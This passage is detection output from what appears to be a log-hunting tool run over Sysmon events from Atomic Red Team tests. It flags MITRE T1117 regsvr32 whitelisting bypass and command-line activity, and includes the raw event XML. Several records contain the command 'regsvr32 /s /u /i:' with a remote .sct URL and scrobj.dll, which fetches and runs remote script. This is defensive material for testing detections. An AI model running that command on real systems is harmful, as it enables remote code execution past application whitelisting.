<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:53:46.848703Z"">
</TimeCreated>
<EventRecordID>4044</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:53:46.831</Data>
<Data Name=""ProcessGuid"">747F3D96-D97A-5D31-0000-00109DDC3800</Data>
<Data Name=""ProcessId"">3564</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\regsvr32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Microsoft(C) Register Server</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\syswow64\regsvr32.exe&quot; /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=CE09FA2A1DD10D0F675A1F0513F3C4EE4D7C3AC0,MD5=4D97D6FC07642D4F744C8C59DB674302,SHA256=E0E722A00C127E0425D2078E738B7A684C9F55A9BF521C67E9A40D796C8BE0E9,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Regsvr32,1563548026.893188,2019-07-19T18:53:46.893188+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\regsvr32.exe ) through command line ( &quot;C:\Windows\syswow64\regsvr32.exe&quot; /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:53:46.848703Z"">
</TimeCreated>
<EventRecordID>4044</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:53:46.831</Data>
<Data Name=""ProcessGuid"">747F3D96-D97A-5D31-0000-00109DDC3800</Data>
<Data Name=""ProcessId"">3564</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\regsvr32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Microsoft(C) Register Server</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\syswow64\regsvr32.exe&quot; /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=CE09FA2A1DD10D0F675A1F0513F3C4EE4D7C3AC0,MD5=4D97D6FC07642D4F744C8C59DB674302,SHA256=E0E722A00C127E0425D2078E738B7A684C9F55A9BF521C67E9A40D796C8BE0E9,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548026.893188,2019-07-19T18:53:46.893188+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\regsvr32.exe ) through command line ( &quot;C:\Windows\syswow64\regsvr32.exe&quot; /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:53:46.848703Z"">
</TimeCreated>
<EventRecordID>4044</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:53:46.831</Data>
<Data Name=""ProcessGuid"">747F3D96-D97A-5D31-0000-00109DDC3800</Data>
<Data Name=""ProcessId"">3564</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\regsvr32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Microsoft(C) Register Server</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\syswow64\regsvr32.exe&quot; /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=CE09FA2A1DD10D0F675A1F0513F3C4EE4D7C3AC0,MD5=4D97D6FC07642D4F744C8C59DB674302,SHA256=E0E722A00C127E0425D2078E738B7A684C9F55A9BF521C67E9A40D796C8BE0E9,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,1563548026.848703,2019-07-19T18:53:46.848703+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\regsvr32.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.0.133 ) and port ( 443 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>3</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>3</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:53:46.589404Z"">
</TimeCreated>
<EventRecordID>4043</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3400"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">Suspicious NetCon</Data>
<Data Name=""UtcTime"">2019-07-19 14:53:40.896</Data>
<Data Name=""ProcessGuid"">747F3D96-D978-5D31-0000-0010EB313800</Data>
<Data Name=""ProcessId"">2076</Data>
<Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""Protocol"">tcp</Data>
<Data Name=""Initiated"">true</Data>
<Data Name=""SourceIsIpv6"">false</Data>
<Data Name=""SourceIp"">10.0.2.15</Data>
<Data Name=""SourceHostname"">MSEDGEWIN10.home</Data>
<Data Name=""SourcePort"">49728</Data>
<Data Name=""SourcePortName""></Data>
<Data Name=""DestinationIsIpv6"">false</Data>
<Data Name=""DestinationIp"">151.101.0.133</Data>
<Data Name=""DestinationHostname""></Data>
<Data Name=""DestinationPort"">443</Data>
<Data Name=""DestinationPortName"">https</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548026.589404,2019-07-19T18:53:46.589404+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:53:46.565529Z"">
</TimeCreated>
<EventRecordID>4042</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:53:46.405</Data>
<Data Name=""ProcessGuid"">747F3D96-D97A-5D31-0000-001089BD3800</Data>
<Data Name=""ProcessId"">7148</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Regsvr32,1563548026.565529,2019-07-19T18:53:46.565529+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\calc.exe ) through command line ( &quot;C:\Windows\System32\calc.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:53:46.204886Z"">
</TimeCreated>
<EventRecordID>4041</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:53:46.135</Data>
<Data Name=""ProcessGuid"">747F3D96-D97A-5D31-0000-00105DA83800</Data>
<Data Name=""ProcessId"">4336</Data>
<Data Name=""Image"">C:\Windows\System32\calc.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Calculator</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\calc.exe&quot; </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D978-5D31-0000-0010EB313800</Data>
<Data Name=""ParentProcessId"">2076</Data>
<Data Name=""ParentImage"">C:\Windows\System32\regsvr32.exe</Data>
<Data Name=""ParentCommandLine"">regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1563548024.117123,2019-07-19T18:53:44.117123+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\regsvr32.exe) with commandline ( regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:53:44.054072Z"">
</TimeCreated>
<EventRecordID>4038</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:53:44.049</Data>
<Data Name=""ProcessGuid"">747F3D96-D978-5D31-0000-0010EB313800</Data>
<Data Name=""ProcessId"">2076</Data>
<Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Microsoft(C) Register Server</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D978-5D31-0000-0010442F3800</Data>
<Data Name=""ParentProcessId"">2832</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Regsvr32,1563548024.117123,2019-07-19T18:53:44.117123+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:53:44.054072Z"">
</TimeCreated>
<EventRecordID>4038</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:53:44.049</Data>
<Data Name=""ProcessGuid"">747F3D96-D978-5D31-0000-0010EB313800</Data>
<Data Name=""ProcessId"">2076</Data>
<Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Microsoft(C) Register Server</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D978-5D31-0000-0010442F3800</Data>
<Data Name=""ParentProcessId"">2832</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548024.117123,2019-07-19T18:53:44.117123+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:53:44.054072Z"">
</TimeCreated>
<EventRecordID>4038</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:53:44.049</Data>
<Data Name=""ProcessGuid"">747F3D96-D978-5D31-0000-0010EB313800</Data>
<Data Name=""ProcessId"">2076</Data>
<Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Microsoft(C) Register Server</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D978-5D31-0000-0010442F3800</Data>
<Data Name=""ParentProcessId"">2832</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548024.054072,2019-07-19T18:53:44.054072+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:53:44.026061Z"">
</TimeCreated>
<EventRecordID>4037</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:53:44.010</Data>
<Data Name=""ProcessGuid"">747F3D96-D978-5D31-0000-0010442F3800</Data>
<Data Name=""ProcessId"">2832</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548024.054072,2019-07-19T18:53:44.054072+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:53:44.026061Z"">
</TimeCreated>
<EventRecordID>4037</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:53:44.010</Data>
<Data Name=""ProcessGuid"">747F3D96-D978-5D31-0000-0010442F3800</Data>
<Data Name=""ProcessId"">2832</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
